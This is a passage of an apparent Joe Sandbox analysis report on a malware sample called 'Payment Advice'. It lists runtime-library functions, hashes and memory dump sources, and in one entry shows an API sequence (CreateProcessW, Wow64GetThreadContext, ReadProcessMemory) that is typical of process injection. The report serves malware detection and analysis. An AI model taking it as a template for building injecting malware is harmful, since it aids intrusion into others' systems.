Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: b3d3d9166822806752984dc64785cda73259529a4178e27debd92dc07bb8c090
Instruction ID: e3a539e549f54e05fc486a3df6c6733c8ccc1d9b7f2525712165a79fecc1516c
Opcode Fuzzy Hash: b3d3d9166822806752984dc64785cda73259529a4178e27debd92dc07bb8c090
Instruction Fuzzy Hash: 0B118E75904342ABC700EF69E84991EBFEAFBD6B50F00491EF584872A1DB709994CB92

Function 005AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 005AEA29
__close_nolock.LIBCMT ref: 005AEA42

Part of subcall function 005A7BDA: __getptd_noexit.LIBCMT ref: 005A7BDA

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: b3edb17fdde6ef8cf727babb849a7acb9f3a251485fca12d58e68e043d4ba917
Instruction ID: bf7d0b34268287aebb72819b25969942bdb4a543b314889fc7e0c509676c89a6
Opcode Fuzzy Hash: b3edb17fdde6ef8cf727babb849a7acb9f3a251485fca12d58e68e043d4ba917
Instruction Fuzzy Hash: 13118E729096169AD712BF68D84B35D7EA27FC3331F2A4740E4345F1E3CBB88D418AA1

Function 0059F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 005A395C: __FF_MSGBANNER.LIBCMT ref: 005A3973
Part of subcall function 005A395C: __NMSG_WRITE.LIBCMT ref: 005A397A
Part of subcall function 005A395C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000001,00000000,?,?,0059F507,?,0000000E), ref: 005A399F

std::exception::exception.LIBCMT ref: 0059F51E
__CxxThrowException@8.LIBCMT ref: 0059F533

Part of subcall function 005A6805: RaiseException.KERNEL32(?,?,0000000E,00636A30,?,?,?,0059F538,0000000E,00636A30,?,00000001), ref: 005A6856

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: e2e2e827217335b5c004f109f44f0b4423fa5db203026b51dd74b5f3c85fb0e4
Instruction ID: a4ea7c773071d1db9938c14a55647637ccf37b9a4f5cd72c9654ccb68d6205a8
Opcode Fuzzy Hash: e2e2e827217335b5c004f109f44f0b4423fa5db203026b51dd74b5f3c85fb0e4
Instruction Fuzzy Hash: 16F08C3110421BA7DF04BE9CD80599F7EA9BF41354F648525F908D2181DBB0964097A5

Function 005A3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A3868
__lock_file.LIBCMT ref: 005A3889

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 13af27248fd9cd230675bc816a97254a528aa7659bf8aba94c614c534d66544a
Instruction ID: ee7d4cbbc1cd77473ea076c3a28c7ab6ee527cd694adf30ce7176df7fd612733
Opcode Fuzzy Hash: 13af27248fd9cd230675bc816a97254a528aa7659bf8aba94c614c534d66544a
Instruction Fuzzy Hash: 6501717180120BEBCF22AFA48C0949E7F61BFC2360F198119F8245A1A1D7758B61DF91

Function 005A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

__lock_file.LIBCMT ref: 005A3629

Part of subcall function 005A4E1C: __lock.LIBCMT ref: 005A4E3F

__fclose_nolock.LIBCMT ref: 005A3634

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 70bc7d521ba1c34f764996ba384f00b60a24c2da9e5065655538570c99e6cd55
Instruction ID: b5ed38370afb12393147af20453408c53f5251815f676f3631dd8438f94e8f07
Opcode Fuzzy Hash: 70bc7d521ba1c34f764996ba384f00b60a24c2da9e5065655538570c99e6cd55
Instruction Fuzzy Hash: 41F0BB31901206AADB117F65C80A75E7EE07F93338F298508F421AB2C1C77C8A419F55

Function 0058C1DE Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0059E581,00000010,?,00000010,?,00000000), ref: 0058C1F4
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0059E581,00000010,?,00000010,?,00000000), ref: 0058C224

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 94a943d4c8180c89aba7804fb4a05f4ff3a00581960974aa543841037e9d0f71
Instruction ID: 092852f607c68d71bd443e7f1f748cf5b0ff42e3e524503bfa9233faaba5cf40
Opcode Fuzzy Hash: 94a943d4c8180c89aba7804fb4a05f4ff3a00581960974aa543841037e9d0f71
Instruction Fuzzy Hash: CC014B72240215BBEB146A65DC4AFBB7F6DEF85760F108169F90ADE1E0DA71A84087B0

Function 0175129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01751A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01751AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01751B13

Memory Dump Source

Source File: 00000000.00000002.1639436591.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1750000_Payment Advice.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: dbf6c627d333593b75bed08bb3b44009780e9dcee286dc2e3b0774d66e54935f
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: B212DD24E24658C6EB24DF64D8507DEB232EF68301F1090E9910DEB7A5E77A4F81CF5A

Function 0058E8A0 Relevance: 1.7, APIs: 1, Instructions: 192windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0058E959

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 080a69b304dc0e986c63988364c27d3565b4cb39aebb9dd563d12a1101458c2f
Instruction ID: a24d1622c6f819f392e458ee7f4b0cf4be3ab3b6a09f206885388cdc2f244bb6
Opcode Fuzzy Hash: 080a69b304dc0e986c63988364c27d3565b4cb39aebb9dd563d12a1101458c2f
Instruction Fuzzy Hash: 107118709093858FEB26DF24C8497697FE1FB52304F08497EEE859B2A1E375D885CB42

Function 005A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 005A2A0B

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: db9a654da649937e9872a931a9deb72fe471b4f619e4c4bbc33cd24bfeefa13c
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 314172717007069FDB288F6DC8965AF7FA6BF86760F24852DE855C7640EBB0DD818B40

Function 005F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 005F9A80

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 520dcf0b24c6e03aa889c1f48c7aa5eabdd6c792108bda8958112496bd5dd5af
Instruction ID: 8077f0bce19c83ce587b0ada2ee13f6d6c23c071c103a63fbe3d411eddfdccd6
Opcode Fuzzy Hash: 520dcf0b24c6e03aa889c1f48c7aa5eabdd6c792108bda8958112496bd5dd5af
Instruction Fuzzy Hash: 4D413D705086518FDB24DF14C488B2ABFE1BF85304F19899CE99A4B362C376EC85CF52

Function 005AED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 03e1c2f082e080b5ecbf00eaca9c619a0486b1c9988dada50fe42d6e9029ddb7
Instruction ID: a75f24937ef65a9d65ad8143b2318f5f43165e1b12c24db61b137bcd2b909d0a
Opcode Fuzzy Hash: 03e1c2f082e080b5ecbf00eaca9c619a0486b1c9988dada50fe42d6e9029ddb7
Instruction Fuzzy Hash: EC216F7284464A9BD7127FA8DC4A35D3E617F83735F260644E4304B1E3DBB48D008BB1

Function 0059D922 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0059D958

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 2346fe3ccb5e946160d2275b9b848911c14541cca9c91a7213fd62ef9063bc33
Instruction ID: 44997d34b22f491d81dc0323c1dd4b9ad296a3b761ff4da3a78159abcda27017
Opcode Fuzzy Hash: 2346fe3ccb5e946160d2275b9b848911c14541cca9c91a7213fd62ef9063bc33
Instruction Fuzzy Hash: 46117F7590010EABCF15FF94D8868EEBFB9FF95355F104026F925A71A0DA309944CBA2

Function 005841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00584214: FreeLibrary.KERNEL32(00000000,?), ref: 00584247

LoadLibraryExW.KERNELBASE(00000001,00000000,00000002,?,?,?,?,005839FE,?,00000001), ref: 005841DB

Part of subcall function 00584291: FreeLibrary.KERNEL32(00000000), ref: 005842C4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: ef7d3d0b2d54659c14ce18829c15dc74a9ed931b933558d6803686a40baf8895
Instruction ID: 5648b48bd64956068a8c6f3eee864bb3c4b2daa9c5893d89ac78382c1c0af25c
Opcode Fuzzy Hash: ef7d3d0b2d54659c14ce18829c15dc74a9ed931b933558d6803686a40baf8895
Instruction Fuzzy Hash: 37119435604207AADB10BB64DC0AFAE7FA5BF80700F108829BD97B6181EA759A449F60

Function 005F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 005F9B51

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4d48e03340d3ab630ff4653cca75d81599afc25cd8527d9e3c61918235441680
Instruction ID: 25f783da171e8c66c16b3f7852f15c5d684fcd8a3363d7807aee1f5b0735c8e3
Opcode Fuzzy Hash: 4d48e03340d3ab630ff4653cca75d81599afc25cd8527d9e3c61918235441680
Instruction Fuzzy Hash: 93210770508702CFDB24DF64C448A1ABFE1BF85304F254968EA9A5B262C731E845DF92

Function 005AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 005AAFC0

Part of subcall function 005A7BDA: __getptd_noexit.LIBCMT ref: 005A7BDA

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: bcc5a10e728ddbf116ea37cc0e8207e1b049f20bb4e5aef9acc6bb675d318dfe
Instruction ID: 5cbe97ccb1cafbecac3249e380c6b1a001de36d4256d53651c1446b952b423f1
Opcode Fuzzy Hash: bcc5a10e728ddbf116ea37cc0e8207e1b049f20bb4e5aef9acc6bb675d318dfe
Instruction Fuzzy Hash: 4C1190728056159FE7126FA49C0935E3EA1BF87331F1A4640E5300B1E3D7B88D009BA1

Function 005839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction ID: 02341d0082900ee2c52a450e592bf9fb80a8c1d4e440c395770de7c33cf9fd81
Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction Fuzzy Hash: CC01627150414EAE8B04FFA4C8968FEBF74BB50304F008069A916A6195EA309A49CF60

Function 005A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 005A2AED

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: aefdf99cf76e43d18414c57a636311aeb6c2557093e2967feb2da00201f2eeed
Instruction ID: b1a502b2e773ab4d5e87116f4fdc71e3e9c59d390478ec75ebed59bae03a8ba1
Opcode Fuzzy Hash: aefdf99cf76e43d18414c57a636311aeb6c2557093e2967feb2da00201f2eeed
Instruction Fuzzy Hash: E3F0623150021AEBDF21AFA88C0B79F3EA5BF82320F198415B8149A191D7B88A52DB51

Function 00584252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,005839FE,?,00000001), ref: 00584286

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fbafbba628a51f1d5b435ee1ae09f59bcd599686f6f372764c816856c03b4d59
Instruction ID: e472d95b21a9aa5cfdcc8515d30c5127757193c046363c207f2b4da444fc598d
Opcode Fuzzy Hash: fbafbba628a51f1d5b435ee1ae09f59bcd599686f6f372764c816856c03b4d59
Instruction Fuzzy Hash: 96F01579509702CFCB34AF64D894816BBE5BF043297248A6EF9D792610C7729844DF50

Function 005840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005840C6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 91db8d75daec8f5360e0d2b49ee6f94641d4609b7959500144ee52967b279952
Instruction ID: 872d83888e50aa5f0f3b329fd6467973a0cc71099ac01da8d1c2209b89c95cc5
Opcode Fuzzy Hash: 91db8d75daec8f5360e0d2b49ee6f94641d4609b7959500144ee52967b279952
Instruction Fuzzy Hash: 10E0CD375401255BC711A694DC46FEF779DEFC8690F0501B5F905E7244DD74D9818790

Function 005CBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 005CBD16

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 5bb3e94412b21968c4882bee6626e4704b091120a5df0541301797ee289740b6
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: E0E092B0104B009FDB348A24D801BE377E0FB06309F00085DF29B83241EB627C41C659

Function 0059ED18 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0059EDC7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
